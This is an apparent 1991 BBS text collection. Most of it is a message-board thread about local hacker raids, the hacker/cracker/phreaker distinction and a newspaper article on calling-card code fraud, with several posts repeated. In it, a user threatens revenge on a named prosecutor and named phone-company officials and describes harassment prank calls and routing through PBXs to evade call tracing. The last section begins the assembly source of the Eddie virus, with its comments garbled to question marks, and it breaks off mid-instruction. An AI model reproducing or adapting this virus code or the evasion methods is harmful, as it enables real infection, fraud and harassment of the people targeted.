not mind their presence. Freedom to call, you don't want to read their stuff, don't, and besides, they have helped us fill in holes to keep other's out. ????????????? ?? MADMAN! ?? ????????????? 48/50: You are right Toad... Name: Madman #56 Date: Tue Sep 24 03:32:09 1991 RE: bahahaha I am not afraid of you...what is the worst you could do? Make us rebuild from scratch? Ouch. Actually, it probably would be a blessing in disguise in some ways...anyhow, no, I am not afraid of very much... MADMAN 49/50: The sysops here Name: Madman #56 Date: Tue Sep 24 03:45:32 1991 1. We will never lock anyone out because of what they claim to be or not be in the computer world. New users, hackers, pirates, PD users, posters, squids - all are welcome as long as they follow our rules for the board and help make it a good place to call. 2. We will never lock out a good user - and that definition is fairly subjective but does have guidlines. In essence, it is someone who helps keep the board going. Someone who spots a hole and helps close it. Someone who makes the online games a challenge for all. Someone who posts interesting and provocative messages within the guidelines we have set (like you Bugs). Someone who if needed, can find that program we need, or help us by making that dam Ansi, or whatever. In short, if the person is constructive, he or she is highly desirable to this board. 3. We believe in fair reporting - we fight for it in every case where someone is accused of hacking or crashing a board. We want to hear ALL sides and provide an open forum for such, and if someone tries to provide heresay as evidence or something questionable, we will say so or delete it outright (we do not believe that is censorship - that is editting out what a judge be say to be inadmissable evidence or such.) As for opinions, they are always welcome too - as long as they are expressed again within the guidelines in our rules of what is allowed in the messages areas (no cussin and such)... 4. We - at least I do - when we find a question, such as the current one on warrants and what they cover, and there is confusion, seek to find an answer to post to cover it. In the case of warrants, I asked a person on another board in the legal profession in generic terms, what a warrant covers and all...soon as the answer comes, I will post it... 5. If any user feels this is a wrong attitude, it is their business and they are free to not participate in the conversation. But we shall not cease to provide an open forum. ????????????? ?? MADMAN! ?? ????????????? Read:(1-50,^49),? : 50/50: Thanks for including us Squids Madman!! Name: The Grunt #20 Date: Tue Sep 24 05:13:51 1991 TSIA! ??????? ??????? ??????? 48/50: It may NOT be an NSA problem.. Name: Bluejay Bandit #183 Date: Wed Sep 25 18:23:33 1991 but why are all the people that are getting busted NSA members??? Hmmm??? I KNOW the story behind Don Moore, so thats about the only case I can honestly say I know first hand. Otherwise, its second hand knowledge I hear about the others... Also, on the issue of virii. I think SOME Virii are pretty cool and VERY educational. But, the ones I do NOT support are the ones that delete data or crash software. Its quite a task to produce an effective virii, and quite a challenge.... 49/50: That's been my experience... Name: Bugs #24 Date: Wed Sep 25 02:51:06 1991 RE: Hacking/Cracking of the definition, Kid. Crackers are whizzes. Hackers are psychopaths. With the simple touch of a key on a computer they wreak havoc on innocent people. That to me is hardly a challenge in spite of the crap that's been thrown on this board. Hackers are overweight hydrocephalic idiot savants, incapable of interaction with the rest of the world. Girlfriends? I've never known a hacker to have one. Unless of course you count stolen Playboy centerfolds. ~~~\/BUGS 50/50: That's what I thought. Name: Bugs #24 Date: Wed Sep 25 02:53:54 1991 RE: Actually But who are these people that bring viruses into systems? From everything you've said hackers are innocent lambs, who have innocent theories and statements but never act them out. Okay. ~~~\/BUGS 44/50: Yea... Name: Bluejay Bandit #12 Date: Mon Sep 23 21:57:54 1991 Irie Man said he took down Love Connection because he was getting hassled. Avtually, I hear they took his WHOLE setup, including computer, desk, things inside desk, yearbook, diplomas, etc etc. So, no Love Connection for awhile. SUN DEVIL II is running High. If you have something that isnt "legal", I suggest you hide it quick before someone comes knocking on yer door... Do I hear FORMAT calling??? Invalid, I'll get the number for ya to ASU. 44/50: hmmm Name: Flowers And Corndogs #19 Date: Tue Sep 24 00:46:40 1991 RE: Yea... actually it depends whether you consider someone who got caught on their own accord stupid or not. lots of guys out there that havent been caught, and they arent gonna stop cos some gov't agency is around. 45/50: The lowdown as I have pieced it together. Name: Madman #10 Date: Tue Sep 24 01:16:11 1991 RE: hmmm 1. Love COnnection and Irie Man were NOT busted. He took his board down after hearing what happened to Damaged and removed it for safety sake and is staying low. 2. Toad is also staying low, as he to was not to my knowledge gone after yet. 3. Damaged had his house trashed by the cops as they went after him, he may have released two new virii, he is on the run so to speak, and I have not found out exactly what he is supposed to have done. Astro, thought, has indicated that it had to with things releated to finding and using phone numbers connected to computers - hacking type things. 4. That, in short, is it. This is all I learned up til about 1am Tuesday morning...I am keeping/capturing all message off Cardboard Box and other places and after awhile will put them in order so all can see it...stay tuned for more... MADMAN 46/50: Yeah... Name: Two Wheel Demon #30 Date: Tue Sep 24 06:12:18 1991 RE: Yea... I thought that he just hid everything, and nothing happened to toad? Strange, I thought Toad was much more involved than Irie 47/50: Well...Mind Rape... Name: Bluejay Bandit #12 Date: Wed Sep 25 14:02:35 1991 FINALLY got busted because of a lil stunt he pulled (or supposedly pulled) on ASU's VAX. He told someone that he was gonna take down the system with standard user accounts. Well, that same day, the VAX DID go down. There is no evidence which connects him to the VAX going down, but ASU, HONEYWELL, HP, and the FBI figure the "brag" was sufficient evidence... I hear they took his whole setup too....but, ASU didnt press charges. 48/50: Verify Name: Madman #10 Date: Thu Sep 26 15:32:16 1991 RE: Well...Mind Rape... That Mind Rape is Damaged is DIgital Phreak...if true, then I guess if what you say is the reason he got busted is accurate, we now know a LOT more of the story... MADMAN 49/50: oooh Name: Full Moon #19 Date: Thu Sep 26 16:10:57 1991 i didnt know sectorz had more than one handle. but i never asked. and gee, are those happy hamsters yours? 50/50: Thanx man... Name: Goliath #57 Date: Thu Sep 26 17:00:32 1991 RE: Yea... Shit this OSII thing is scaring the shit outta me!! Thanx BJB... I really could use that number! eh iNVALiD MEDiA people don't pay taxes (I'm not pointing fingers at anyone on this board, just some people in general), yet they get at least halfway decent treatment by others. Read:(1-50,^7),? :1 1/50: All true. Name: Astro #402 Date: Mon Sep 23 05:50:19 1991 RE: Seizures During Searches ALSO, if they find, say, computer disks, they ARE NOT allowed to use them or even do a directory on them. Same goes for video. If the police find a video tape of you molesting 6 year olds, that is not valid evidence for they are not allowed to view it... Read:(1-50,^1),? :C 2/50: !!! Name: Astro #402 Date: Mon Sep 23 05:56:55 1991 RE: See... Sorry, bud, but NSA has nothing to do with this. For some reason, this is personal... 3/50: Now Name: Madman #56 Date: Mon Sep 23 09:32:11 1991 RE: ... that sounds a bit much...maybe a good lawyer would be in order. I will ask a person I know on another board about warrants and such and see what he says and get back to you... ????????????? ?? MADMAN! ?? ????????????? 4/50: ... Name: Damaged #303 Date: Mon Sep 23 11:01:08 1991 RE: Oh... hahahaha, there are 6 versions of it. And all of them translated to C 5/50: Searched by the feds Name: Troubled Youth #115 Date: Mon Sep 23 12:31:29 1991 RE: replies.... 10 times, always for fiber samples. Never found a match. Don't worry, be happy. 6/50: ... Name: Damaged #303 Date: Mon Sep 23 15:19:23 1991 RE: All I've got to say about hacking... This proves you ARE A FUCKING IDIOT! One "True Hackers" do not CRASH Boards, only idiots that do that. 2! If it WASN'T for HACKERS, you wouldn't be sitting here BBS'N! Hackers CREATED this world! 3. Hackers do live a life also! But what is wrong witha little computer liking, Hell! I fucking sit my compter for hours upon ends, and I still have time for my girl, partying, talking to friends and STILL go to college (well ). I'm sorry but you are so uninformed that, you are engaging without a life preserver!5??????* 7/50: I hafta Name: The Rush #590 Date: Mon Sep 23 18:23:44 1991 admit - I don't have any problems with hackers. I stay outa their business. They get treated like crap, though, and that really sucks. Because a lot of people don't pay taxes (I'm not pointing fingers at anyone on this board, just some people in general), yet they get at least halfway decent treatment by others. 8/50: good point Name: Full Moon #12 Date: Mon Sep 23 18:48:22 1991 RE: ... this little cyberspace world was created by hackers. or didnt bugs know that? 9/50: Hacking/Cracking Name: The Whiz Kid #78 Date: Mon Sep 23 23:36:52 1991 Hacking for the most part is trying to gain access to a board, with the intention of leeching, obtain private records/files or crashing the board itself... On the Other hand, you Idea of a hacker, is really that of a Cracker... Crackers started the BBSing world with their Internation network of pirated software, from HQ to Safe-Houses... I've been in this bbs world for over 5 years and ??I know what goes on, in fact I used to be with a group at one time (Big deal, it suxed too) Black Boxes, Phreaking, ect: All I can say, is uhm, well expect a cop knocking on your door before you log off.. TWK (The Obtainig private records and Files also includes hacking MCI codes) 10/50: Actually Name: Madman #56 Date: Tue Sep 24 03:29:01 1991 RE: All I've got to say about hacking... as long as they do not break the rules, we do not mind their presence. Freedom to call, you don't want to read their stuff, don't, and besides, they have helped us fill in holes to keep other's out. ????????????? ?? MADMAN! ?? ????????????? 11/50: The sysops here Name: Madman #56 Date: Tue Sep 24 03:45:32 1991 1. We will never lock anyone out because of what they claim to be or not be in the computer world. New users, hackers, pirates, PD users, posters, squids - all are welcome as long as they follow our rules for the board and help make it a good place to call. 2. We will never lock out a good user - and that definition is fairly subjective but does have guidlines. In essence, it is someone who helps keep the board going. Someone who spots a hole and helps close it. Someone who makes the online games a challenge for all. Someone who posts interesting and provocative messages within the guidelines we have set (like you Bugs). Someone who if needed, can find that program we need, or help us by making that dam Ansi, or whatever. In short, if the person is constructive, he or she is highly desirable to this board. 3. We believe in fair reporting - we fight for it in every case where someone is accused of hacking or crashing a board. We want to hear ALL sides and provide an open forum for such, and if someone tries to provide heresay as evidence or something questionable, we will say so or delete it outright (we do not believe that is censorship - that is editting out what a judge be say to be inadmissable evidence or such.) As for opinions, they are always welcome too - as long as they are expressed again within the guidelines in our rules of what is allowed in the messages areas (no cussin and such)... 4. We - at least I do - when we find a question, such as the current one on warrants and what they cover, and there is confusion, seek to find an answer to post to cover it. In the case of warrants, I asked a person on another board in the legal profession in generic terms, what a warrant covers and all...soon as the answer comes, I will post it... 5. If any user feels this is a wrong attitude, it is their business and they are free to not participate in the conversation. But we shall not cease to provide an open forum. ????????????? ?? MADMAN! ?? ????????????? 12/50: It may NOT be an NSA problem.. Name: Bluejay Bandit #183 Date: Wed Sep 25 18:23:33 1991 but why are all the people that are getting busted NSA members??? Hmmm??? I KNOW the story behind Don Moore, so thats about the only case I can honestly say I know first hand. Otherwise, its second hand knowledge I hear about the others... Also, on the issue of virii. I think SOME Virii are pretty cool and VERY educational. But, the ones I do NOT support are the ones that delete data or crash software. Its quite a task to produce an effective virii, and quite a challenge.... 13/50: That's what I thought. Name: Bugs #24 Date: Wed Sep 25 02:53:54 1991 RE: Actually But who are these people that bring viruses into systems? From everything you've said hackers are innocent lambs, who have innocent theories and statements but never act them out. Okay. ~~~\/BUGS 14/50: Hmmm... Interesting concept, this "Open Forum!" Name: The Crazy Zonie #368 Date: Wed Sep 25 05:22:09 1991 Hehehe... (Nice title!) Anyhow, I normally try to get the whole story before I act! (But, hey! I'm human and had my irrational moment!) But anyways, I'd like to hear what's going on, and for the most part, I never had much trouble from those in question. Madman, I don't see any "Hole" in your rules! When I set up a BBS, that will be my policy! (Sorry that I don't play too many on-line games, but I'm not much of a video game-aholic!) The Craziest man to ever have an oppinion! (hehehe...) 15/50: well Name: Full Moon #12 Date: Wed Sep 25 06:36:01 1991 it is fun to rip on a close minded individual. 16/50: Actually in toads case Name: Two Wheel Demon #60 Date: Wed Sep 25 11:36:40 1991 RE: Sorry to bust your bubble Toad! wouldn't the conviction be null and void after his 18th birthday, he is a minor now and once he becomnes an adult I don't beleive they could prosecute him. Well that is if he was to quite the felony before the 18th b-day ?? ? Tw? Wh??? D?m?n ? ?? 17/50: Actually the holes Name: Madman #56 Date: Thu Sep 26 06:19:48 1991 RE: Hmmm... Interesting concept, this "Open Forum!" I was referring to were backdoors and such that can crash or breach the security of the board. ????????????? ?? MADMAN! ?? ????????????? 18/50: That's been my experience... Name: Bugs #24 Date: Wed Sep 25 02:51:06 1991 RE: Hacking/Cracking of the definition, Kid. Crackers are whizzes. Hackers are psychopaths. With the simple touch of a key on a computer they wreak havoc on innocent people. That to me is hardly a challenge in spite of the crap that's been thrown on this board. Hackers are overweight hydrocephalic idiot savants, incapable of interaction with the rest of the world. Girlfriends? I've never known a hacker to have one. Unless of course you count stolen Playboy centerfolds. ~~~\/BUGS 19/50: Well Name: The Whiz Kid #78 Date: Wed Sep 25 04:11:08 1991 I have no Prob with that MadMan, I some times don't post much as for i'm not interested in the current subject or their isn't anything else to say that already hasn't been said.... But then again, once I hope in the Messages (can take awhile for some boards) But once into the flow.. Gulp, a couple new messages for the next user.. TWK 20/50: ... Name: Astro #402 Date: Wed Sep 25 06:15:56 1991 RE: The sysops here I totally agree with everything, except point number 3. Madman, you KNOW what I'm talking about, and what relavence it has to point number 3. 21/50: Letting Hackers stay on Cardboard box Name: Two Wheel Demon #60 Date: Wed Sep 25 11:38:09 1991 RE: All I've got to say about hacking... maybe that comes under know your enemies, but more than likely, what is wrong with having them on here. It isn't liek they are allowed to do their hacking here, and they really don't talk about it here, so what is the problem with them being here, we should be prejudicial should we? ?? ? Tw? Wh??? D?m?n ? ?? 22/50: What he is referring too Name: Madman #56 Date: Thu Sep 26 06:28:56 1991 is that he takes exception with Point 3 in the way I handled his posting (and Gaiden's) in response to a board crash at Cherry's... ????????????? ?? MADMAN! ?? ????????????? 23/50: Sorry Name: Madman #56 Date: Thu Sep 26 06:47:30 1991 that I got the order screwed up a bit, but go on from where we were...if wanted, I will post a summary to date compiled from here and other sources... ????????????? ?? MADMAN! ?? ????????????? 24/50: Open Forum sounds good. Name: The Crazy Zonie #368 Date: Thu Sep 26 14:39:21 1991 Well, I've never seen any problems here from the individuals in quetoin, except maybe an occasional personality conflicts. (But hey, we all cannot be friends. :( ) Hmmm... So long as they kept their activities to themselfs and off the innosent boards, they're okay. I know of one guy that I barely met through a Hillel Service, (But i cannot remember his name!) He was just casually talking about how viruses were so much fun! (I was talking with the NJG about her mac class, and he overheard!) He even told me that he rewrote the system password for a software demo computer, because the machine did not have it on the (It as in a prog he was interested in) disk, and the sales clerk refused to give him the password to drop to dos. (From what I understand, that was company policy!) I don't think I want to BBS with people like that. I'm sorry, but you just don't go changing someone's passwork, just because you don't like the fact he won't give you access to DOS! The Crazy ZOnie... 25/50: well Name: Full Moon #12 Date: Thu Sep 26 17:04:39 1991 as expected, the guys who crashed omni admitted their guilt, and, as expected, it wasnt gaiden. 26/50: Attempt at clarification... Name: Bugs #24 Date: Thu Sep 26 18:49:02 1991 First of all, I know of NO ONE on this board who are hackers and I don't want to. I NEVER named anyone's name because I don't KNOW anyone's particular talents[although from some of the attacking posts I'm not far off the mark]. I'm still in the dark as to who the kid from ASU is. I or we haven't been told what infractions if any were committed. I gave my opinion on hackers. I stand by it. Period. Anyone taking my statements personally either has a thin skin or is guilty. But no finger pointing was intended on my part. ~~~\/BUGS 27/50: no you are WRONG Name: The Toad #68 Date: Thu Sep 26 20:39:18 1991 RE: That's what I thought. bugs, that is because there are 2 main types of hackers 1) Good hackers, and 2) bad hackers, you are desscribing a bad hacker, a good hacker trie never to destroy data UNLESS it is to insure his saftey. no we are NOT innocent, we know what we do and we know that it is wrong but you must understand one thing it has become a way of life for most,.. Also get a copy of The Arizona Republic street edition for Thursday,Sept, 25, 1991, in Secton B page B8 (very back) it discusses what is going on. 28/50: grin Name: The Toad #68 Date: Thu Sep 26 20:42:58 1991 RE: Actually in toads case well that means 4 years to wait. as of now I have no intention to stop until I get revenge on the following people Gail Thackery (prosecuter of Sun-Devil and prosector of Damaged), Mark Knighton, security director for LDL, and Jim Waltman fraud manager for U S West. those are the one responsible for this. They deserve atleast one call from me. to express my feelings. 29/50: haha bugs Name: The Toad #68 Date: Thu Sep 26 20:46:17 1991 RE: That's been my experience... you are barking up the wrong tree dude. you must know what a hacker can do to sum one? It is very very nasty. some people have recieved calls like this : "hello mr john doe?, yes this is he., This is Blah blah from sushi under the sun, where did you say you wanted the ton of sushi to be delivered?" 30/50: thank you. Name: The Toad #68 Date: Thu Sep 26 20:50:28 1991 RE: Letting Hackers stay on Cardboard box TWD, you would be surprised how much a hacker can benifit a board. ie Security, I would do anything for R.P.X and this one, I get a call from Ron (sysop of R.P.X) about once every 2 weeks asking me how everything is going and to read me off al his new users, to see if I know anyof them or if they are bad people to have on his system. Believe me I'd rather have a hacker on my side than against me. 31/50: okay well for those who cant get a copy of the newspaper Name: The Toad #68 Date: Thu Sep 26 21:13:38 1991 he is there article I was talking about. Phone scam spurs raid on `hacker' Calling-code fraud target of probe By Fredrick Bermudez If you own a long-distance calling card, take a good look at your next bill. You could be another victim of a billion-dollar electronic fraud in which "hackers," perhaps including on in Phoenix (ONE??? I'm Insulted!!!!), make calls at others' expense. Police seized computer equipment, software and a list of calling-card codes from a north Phoenix home of a colledge student on friday as part of a monthlong investigation. The 19-year-old man is one of seven people - 3 in oregon, and one each in washington, Utah and Iowa - singled out as suspected hackers who used computers to gain access codes, said jim Waltman, a fraud manager for U S West communications. Mark Knighton, security director for LDL lond Distance, said his company and U S west were able to trace calls to several location including the home of the Phoenix man. college students are suspected of selling the codes to other students, a common practice on campuses nationwide, Waltman said. It is unknown how many local customers were wrongly billed in the latest scheme (scheme??? bahahahaha), officials said. Such fraud costs carriers and phone companies as much as $5 billion each year, Waltman said. The Phoenix student who attends A S U, has not been arrested, authorities said. Waltman, an expert on computer hacking (bahaha yeah right! look at one of the notes bellow), said he was with Phoenix police (not to mention US West, FBI, IBM, INTEL, Tymnet) on friday, when they searchedthe north Phoenix home and uncovered what turned out to be an inexpensive and relatively simple system for getting the codes. Calling cards work like this: customers are given a code of six to 14 digits by long-distance carriers such as MCI, sprint and LDL. To make a call, a card holder dials a local-access number, punches in the desired number and code. The call then is billed to the card holder. Waltman said the student. whose name was not re-leased, programmed a home computer to call the local number and randomly try codes. When a code worked, the computer recorded the code. okay well that is the article. note: who ever wrote this article is confused, his term of hacker is actually a "Phreaker". 32/50: I think that Name: Road Kill #434 Date: Thu Sep 26 22:22:42 1991 ...certain hackers could be beneficial to BBS's, like if Toad helps the sysop patch a hole on this board. The kind of hacking that bothers me is when people find it amusing to destroy other people's systems, start bad viruses, etc.. I think that everyone is innocent until proven guilty, so unless someone isproven to have done stuff like board-crashing, they should be allowed to stay on the board. Accusations made against people, like the ones between Astro and Gaiden (if I remember right) should not be considered valid evidence. I agree with Madman's policy, and I enjoy being an active user of this board! ??????? ??????? ??Road Kill?? ??????? ??????? 33/50: Thanks Toad Name: Madman #56 Date: Fri Sep 27 12:02:47 1991 RE: okay well for those who cant get a copy of the newspaper BJB was incorrect, I guess, then - he was saying yesterday on Zycors or Grail Quest that they were after him for crashing the ASU VAX. This makes ALOT more sense... And yes, the term should have been phreaker...anyhow, thanks for posting the article as I missed the paper yesterday... MADMAN 34/50: Well Name: Madman #56 Date: Fri Sep 27 12:04:36 1991 RE: Attempt at clarification... If you have read this far then you know what the story is...if you don't know who is in trouble, then you weren't paying attention cause his initial post started this all (along with Toad's). ????????????? ?? MADMAN! ?? ????????????? 35/50: Hmmm... The State Press had that artical, but I didn't get Name: The Crazy Zonie #368 Date: Fri Sep 27 13:53:09 1991 ...to read it, cause another friend at Hillel snagged it! SIGH! It kinda makes me glad that I don't have a phone card! (Don't need it!) But was that all it was? From the sounds of it, the FEDs were trying to throw the whole set of books at you guys. (at least that was the impression I got from the first set of posts.) Well, I do have yesterday's paper here, so I'll read it! The Crazy Zonie... BTW Toad, I got your "Hi!" from Cat, and I'm saying "Hi!" 36/50: why in the hell... Name: Bugs #24 Date: Fri Sep 27 15:06:11 1991 RE: Well are you taking that quasi-authoritative tone with me? That statement was for everyone. You didn't need to repsond personally unless in email. Get some sleep. Quickly. ~~~\/BUGS /e 37/50: barking up the wrong tree? Name: Bugs #24 Date: Fri Sep 27 15:11:05 1991 RE: haha bugs Are you beggining to take me personally TOAD? Do I detect a threatning tone? ~~~\/BUGS 38/50: Why do you hack Toad? Name: Bugs #24 Date: Fri Sep 27 15:12:59 1991 RE: no you are WRONG Why has it become a way of life for you? ~~~\/BUG 39/50: because Name: The Toad #68 Date: Fri Sep 27 18:00:39 1991 it is a way of learning... 40/50: ... Name: Damaged #303 Date: Sat Sep 28 00:32:08 1991 RE: Hacking/Cracking Blah! True Hackers do not fit the Soceity Image of a Hacker, only little punks wanna fit that Evil Image, We are NOT evil, You must go deeper thean that. 41/50: ... Name: Damaged #303 Date: Sat Sep 28 00:34:19 1991 RE: That's what I thought. I consider my Virii Development/Techology is part of Artifical Intelligence Studies and such whats. 42/50: ... Name: Damaged #303 Date: Sat Sep 28 00:37:30 1991 RE: That's been my experience... I am a Hacker, I do have a girlfriend, actually you may call her my wife in the next few months. You may address my son as Mr. Moore thank you. You speak of stereo types! Hacking isn't computers! It's a State of Mind. Hackers can be part of society, but YOU kinds of less-informed people push us away! "True Hackers" do not wreak people's lives. Only little punks that wear society image of a Hacker do. But you see, we are not society image. We are much more than that. 43/50: ... Name: Damaged #303 Date: Sat Sep 28 00:41:35 1991 RE: Attempt at clarification... oh, that means anyone offended by saying that Blacks are stupid are guilty of being stupid. You fucked up. Just because I am the one being accused doesn't mean that I'm guilty of anything. Just because i'm a hacker, doesn't mean that I have to HIDE my beliefs, HIDE what I am, who i am. Doesn't mean I have to FEEL guilty about it. This is what I am, and You Bugs know that (besides you already know that the college student is me) 44/50: ... Name: Damaged #303 Date: Sat Sep 28 00:46:51 1991 RE: barking up the wrong tree? Of course it's a THREAT, why, YOU INSULTED you LESS-informed idiot. nothing wrong with that, it's just when you start boasting of your SO-CALLed knowledge 45/50: ... Name: Damaged #303 Date: Sat Sep 28 00:47:38 1991 RE: Why do you hack Toad? As i mentioned befored, it's a state of mind, therefore once you realize this, it becomes dominat, for it is fun and very intellectualy satisfing 46/50: .. Name: Astro #402 Date: Sat Sep 28 00:55:35 1991 RE: well Well, the one that crashed Cherry's admitted it, too. But no one was there to listen..... BTW, what you just posted was "hearsay", and NOT valid... 47/50: ??? Name: Astro #402 Date: Sat Sep 28 00:56:46 1991 RE: Attempt at clarification... Well, if you don't know who it is by now, you're FUCKING STOOOPID! 48/50: !!! Name: Astro #402 Date: Sat Sep 28 01:00:31 1991 RE: why in the hell... Dude, E-Mail is for pussies (at least in your case). Just another thing to hide in. Everytime someone says something that a "pussy" doesn't like. "Take it to e-mail!!!". Dude, screw that. This is an open forum, and I don't like you. 49/50: Attention... Name: Madman #56 Date: Sat Sep 28 08:16:47 1991 Cut out the swearing...be civil. Thanks. ????????????? ?? MADMAN! ?? ????????????? 50/50: Hacking Name: The Whiz Kid #78 Date: Sun Sep 29 01:13:05 1991 You have your terms mixed up... (their is no such thing as a true 41/50: When I say "hacker" Name: Road Kill #434 Date: Sun Sep 29 04:38:34 1991 ...I am mainly referring to those that are very computer literate. I try not to imply any good or bad. I am not aware of what the differences are between hacking, cracking, phreaking, etc., so I use hacker as a general term. ??????? ??????? ??Road Kill?? ??????? ??????? 41/50: When I say "hacker" Name: Road Kill #434 Date: Sun Sep 29 04:38:34 1991 ...I am mainly referring to those that are very computer literate. I try not to imply any good or bad. I am not aware of what the differences are between hacking, cracking, phreaking, etc., so I use hacker as a general term. ??????? ??????? ??Road Kill?? ??????? ??????? 42/50: yes. Name: The Toad #68 Date: Sun Sep 29 09:32:44 1991 RE: Hacking I could if I wished to do so, I have user list editors for wwiv and telegard.. I could give my own account 255 - 255 and they would never know it. BUT I would NOT use it on this machine (cardboard box). also I dont like spending my time on hacking into boards, Internet is what I love, any one can phreak with very little knowledge bu hacking is the fun stuff. 43/50: So Damaged! What are they going to do to you?? Name: Cardinal #97 Date: Sun Sep 29 09:58:40 1991 The article in State Press said no charges had yet been filed..Is this true? Do you think they will file charges against you? What about ASU do you think you'll still be a student there when this is over? I hear there student ethics(?) committee is really tough on students who give ASU a black eye in the press.... Another question I have is Why did you do it? Was it the thrill of beating the system or was it just to be a chaepskate and ripoff other people?? I'm not trying to be offensive here, I'm trying to understand the motivation involved in committing an illegal action. Makes a great topic for a research paper... Cardinal 44/50: It's obvious. Name: Batz! #266 Date: Sun Sep 29 12:40:00 1991 Toad and Damaged, it's obvious that most everyone here will never understand the thrill of hacking, nor the true reasons behind it. Batz!~ 45/50: Wasnt it Mind Rape... Name: Bluejay Bandit #183 Date: Sun Sep 29 15:28:20 1991 that was highlighted in The State Press Newsletter? That US West scam? 46/50: Info, please... Name: Steve #136 Date: Sun Sep 29 16:07:37 1991 Has anyone ever heard of group or individual that goes by the handle "Zarcon 3" ? I came into posseession of a file that only displays a message about "Zarcon 3" striking again. In fact, the file has an extension of ".Z-3". I scanned it and found nothing (though I understand that isn't fool proof). Any info would be appreciated. 47/50: hmmm Name: Full Moon #12 Date: Sun Sep 29 17:47:39 1991 RE: Hacking someone has there own terms mixed up in an effort to elaborate them. Cracker (thats a damn stupid word) is not a pirate. fif you crack something, maybe its because you want to make a bloody backup without paying 50 extra bucks. thats perfectly legal. pirate and hacker are different as well, as are hacker and phreaker. although many tend to fit all categories, they are different, even though the media doesnt make such distinctions, because Joe Average doesnt know the difference, and they are just trying to get the story across. 48/50: but. Name: The Toad #68 Date: Sun Sep 29 18:46:50 1991 RE: hmmm A hacker has most phreaker skills, yuo cannot hack on a system calling direct for they will trace you, so you ue phreaking skills and use a extender, pbx, diverter to call through then they trace the # back to the pbx etc. then they call that company more or less the pbx company will not wanna get invlovled.... And yes most of the "hacker experts" have never hacked in there lives, they only read bout us and study us trying to figure us out, our motives, our lifestyles etc... as for what you said cardnal my motives are simple, 1) the trill of beating the system 2) for fun. 3) to learn and to know more than the average computer user. thats about as simple as i can put it. like i have said before hacking has become a way of life. A way of life I have FULL control of.. 49/50: Name: Full Moon #12 Date: Sun Sep 29 21:55:50 1991 well, if, damaged, you did what is alleged, than your rational for hacking is invalid. not to say the allegations are true, but if you did sell codes to other students, than that is damaging and voids your perspective on the whole deal. but i for one don't know what you did and i don't make overzealous conclusions either. its just an observation. 50/50: Hmmm... Name: The Crazy Zonie #368 Date: Sun Sep 29 23:58:46 1991 Well, I'm NOT a hacker, and I'm just strugling on just learning the tempermental things! So, here is one avarage user that you're knowledge is superiour... hehehe... Maybe it's just that I don't see much need to break into any system. (Could it be that I'm happy just coexisting in this computer world? Scary thought!!!) But what's really interesting iis watching the Non computer literate people (And MOST Mac Users!) that I BUILT my own computer! hehehe... They think you have to be some supergenious to just plus crds and copy files! Geese... Now that's real funny! Here's something I think you all will enjoy! Question: How many Feds does it take to change a light bulb? Answer: Two; One to tell you that the siituation is under control, and the other to scew the bulb into the kitchen fauset! The Crazy ZOnie... _____________________________________________________________________________ Phile 6 : ;************************ ;* * ;* E D D I E * ;* * ;* by Dark Avenger * ;* * ;* 3-JAN-1989 * ;* * ;* version 1.31x * ;* * ;************************ ; "Blessed is he who expects nothing, for he shall not be disappointed." ; ???? ??? ???? ???????????? ????? ?? ???? ?? ??????? ????????? ??????. ????? ; ???? ?? ?? ??????????, ??? ? ????? ? ???????? ? ??????, ?? ??????? ???? ?? ; ???? ?? ?? ???????????? ???????? ????? ?? ????????, ?? ? ???? ?? ?????? ????? ; ?? ??????? ????? (??? ? ????????????? ????? ? ??????? ? ??????? ??????, ???? ? ; ? ???????). ??????? ?? ?????????????? ??????? ???????? ?? ?????? 1 ?????? ?? ; ???????????? ?? ???????? ?? ??????. ??? ????? ????? ?? ???????????????? ; ?????? ????? ?????????, ???? ? ????? ????????? ? ???????????? ??????? ??? ; ?????? ?? ?? ? ????????. ????? ???????? ?????????????? ???????? ?? ??????? ; ????? ?????, ????? ???? ?????? ????????? ?? ?????? ? ?? ???? ???????! ??????? ; ????, ??????? ?? ?? ????? ??? ????? ?? ??? ??????? ?????????? ? ?????? ? ; ?????????????? ????????? ???????? ???? (?.?. ?????? ?????). ???????? ; ????????, ?? ???? ????????????? ?????????? .COM ???? ?? ???? ?? ???? ; ?????????. ?? ????? ?????? ?? ????????? ???? ? ??????? 3 ?????, ???????? ; ???????????????? ????? 0e9h, 68h, 0 ? ???? ???? ?? ????????? ????? ?????. ?? ; ?? ????????? ?? ????????? ?????????? JMP ? ???????? ?? ??????. ; ??????????????: ??????? ?? ????? ??????? ??????????? ?? ???????? ??? ; ?????????? ???????? ????, ???????????? ?? ???????????? ??? ??????????????? ?? ; ???? ????? ??? ?? ????????? ??? ??????????? ???. ??????? ???????? ?? ?? ???? ; ?? ??????????????? ??? ?????????? ?? ????????. ; ?? ???? ?? ?? ?? ???????? ?? ?????? ??????????? ?? ???????????? ?? ??? ; ????????????? ???. ??????? ??????, ????? ?? ????? ?????? ??????? ? ????? ; ????, ??????? ??? ??, ??? ??????????? ????? ?? ?????????????????? ?? ????? ; ?????? ???????, ?? ?? ?????? ?? ????? ????? ????????? (???????? ?? ???????? ?? ; C ?????? ?? ? ?????? ?? ?????). ; ???????? ?? ?????? ????????????! code segment assume cs:code,ds:code copyright: db 'Eddie lives...somewhere in time!',0 date_stamp: dd 12239000h checksum: db 30 ; ??????? ?? ???????????? ?? .EXE ????: ; ???????????? DS=ES=PSP, ??????? SS:SP ? CS:IP. exit_exe: mov bx,es add bx,10h add bx,word ptr cs:[si+call_adr+2] mov word ptr cs:[si+patch+2],bx mov bx,word ptr cs:[si+call_adr] mov word ptr cs:[si+patch],bx mov bx,es add bx,10h add bx,word ptr cs:[si+stack_pointer+2] mov ss,bx mov sp,word ptr cs:[si+stack_pointer] db 0eah ;JMP XXXX:YYYY patch: dd 0 ; ??????? ?? ???????????? ?? .COM ????: ; ???????????? 3-?? ????? ? ???????? ?? ?????, ??????? SP ? IP. exit_com: mov di,100h add si,offset my_save movsb movsw mov sp,ds:[6] ;???? ? ?????????? xor bx,bx push bx jmp [si-11] ;si+call_adr-top_file ; ?????? ????? ?? ??????????. startup: call relative relative: pop si ;SI = $ sub si,offset relative cld cmp word ptr cs:[si+my_save],5a4dh je exe_ok cli mov sp,si ;?? .COM ????????? ?? ???????? ??????? add sp,offset top_file+100h ;????, ?? ?? ?? ?? ???????? ?????????? sti ;????? ????? cmp sp,ds:[6] jnc exit_com exe_ok: push ax push es push si push ds mov di,si ; ???????? ?? ?????? ?? INT 13h ? ROM-BIOS xor ax,ax push ax mov ds,ax les ax,ds:[13h4] mov word ptr cs:[si+fdisk],ax mov word ptr cs:[si+fdisk+2],es mov word ptr cs:[si+disk],ax mov word ptr 